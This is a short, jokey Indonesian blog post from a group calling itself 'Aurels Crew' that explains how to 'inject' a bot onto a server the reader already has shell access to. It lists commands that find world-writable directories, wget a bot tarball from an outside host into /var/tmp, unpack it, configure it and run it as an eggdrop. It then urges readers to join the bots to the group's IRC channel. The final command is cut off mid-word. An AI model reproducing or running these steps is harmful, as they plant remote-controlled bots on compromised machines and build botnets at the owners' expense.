Posted in Hacking

Nginject….??!!??


wah…wah..

keknya.. bicara satu kata yang ini nggak bakalan abis-abisnya..

Nginject…>>>> bahasa nyenyenya dari nyuntik..hmm…tapi kalo dipikir-pikir nginject ternyata enak juga…apalagi sampe nginject pacar kita..hahahahahahhaha…

OK..kali ini saya bakalan kupas tentang gimana sech nginject tuh,,.

pertama-tama yang perlu kita siapkan sebotol teh botol sosro..

kedua..yaaaa..jelaslah kita perlu nyediain shell yang masih ho`oh banget..

nih dia caranya:

  1. ketik find / -perm 777 -type d
  2. trus kita cari direktori yang kagak ada label “permision denied” nya
  3. tapi kalo nggak ada ya kita ketik aja cd /var/tmp
  4. trus ketik wget http://geocities.com/ayhee_zila/bot.tar.gz
  5. setelah itu kita ketik tar -zxvf bot.tar.gz
  6. ketik lagi cd /var/tmp/aurels
  7. trus kita mulai config botnya >>> ./nadya [fileconfig] [nickbot] [identbot] [ipaddress] [chanell] [nickowner]
  8. trus abis itu kita run aja caranya>>> ./eggdrop -m [fileconfi

yaaaa…jadi dech…botnya..

hmm…btw kalo ngeload bot jangan yang banyak2 yah..and jangan lupa dijoinin k #aurel..ntar dapet bonus dech… hahahahahhahaha

-=[Aurels Crew]=-

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s